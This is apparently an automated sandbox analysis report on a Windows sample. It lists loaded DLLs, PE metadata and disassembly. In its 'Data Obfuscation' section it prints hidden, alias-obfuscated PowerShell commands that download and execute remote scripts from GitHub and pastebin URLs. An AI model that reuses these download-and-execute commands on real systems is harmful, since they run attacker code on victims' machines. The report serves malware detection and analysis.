Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: BeginSync.lnk.4.drLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: Lm9IJ4r9oO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Lm9IJ4r9oO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Lm9IJ4r9oO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Lm9IJ4r9oO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Lm9IJ4r9oO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Lm9IJ4r9oO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Lm9IJ4r9oO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Lm9IJ4r9oO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: Automation.pdb source: powershell.exe, 00000004.00000002.1820569925.00000000073A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000018.00000002.2227640712.000001D0F6650000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Programming1\ConsoleApplication2\Release\ConsoleApplication2.pdb source: Lm9IJ4r9oO.exe
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000004.00000002.1836250015.0000000008455000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbO source: powershell.exe, 00000018.00000002.2227640712.000001D0F677B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ib.pdb source: powershell.exe, 00000018.00000002.2227640712.000001D0F66A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1836250015.0000000008455000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2227640712.000001D0F673E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000004.00000002.1820569925.000000000739F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2227640712.000001D0F6650000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 5c561934e089\mscorlib.pdb source: powershell.exe, 00000018.00000002.2227640712.000001D0F677B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbg source: powershell.exe, 00000018.00000002.2227640712.000001D0F66A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: e089\mscorlib.pdbHo source: powershell.exe, 00000018.00000002.2227640712.000001D0F677B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Commands.Utility.pdb4e089` source: powershell.exe, 00000004.00000002.1835795117.00000000083B0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Managem..Automation.pdb source: powershell.exe, 00000004.00000002.1820569925.00000000073A1000.00000004.00000020.00020000.00000000.sdmp
Source: Lm9IJ4r9oO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Lm9IJ4r9oO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Lm9IJ4r9oO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Lm9IJ4r9oO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Lm9IJ4r9oO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)'
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.cmdline"Jump to behavior
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: 0_2_00678797 push ecx; ret 0_2_006787AA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07FBBFF8 push eax; mov dword ptr [esp], edx4_2_07FBC124
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08131980 push es; ret 4_2_08131996
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08138A90 push es; ret 4_2_08138AA2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08137548 push eax; mov dword ptr [esp], edx4_2_0813755C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081BD518 pushfd ; retf 4_2_081BD575
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08200B32 push esp; ret 4_2_08200B35
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08207B5C push FFFFFF8Bh; iretd 4_2_08207B75
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08208BE7 push eax; mov dword ptr [esp], edx4_2_08208BFC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08201298 push 84080FCFh; iretd 4_2_082012A1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08281858 pushad ; iretd 4_2_08281859
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08289D58 push FFFFFF8Bh; retf 4_2_08289D5A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0828D200 push eax; mov dword ptr [esp], edx4_2_0828D214
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08283617 push ebx; iretd 4_2_082836DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08330848 push eax; mov dword ptr [esp], edx4_2_08330944
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_083305C0 push eax; mov dword ptr [esp], edx4_2_083305D4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0834D8D0 push es; ret 4_2_0834D8E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB10FB8978 push E8FFFFFEh; iretd 18_2_00007FFB10FB897D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFB10FB5449 push ebp; iretd 18_2_00007FFB10FB55E8
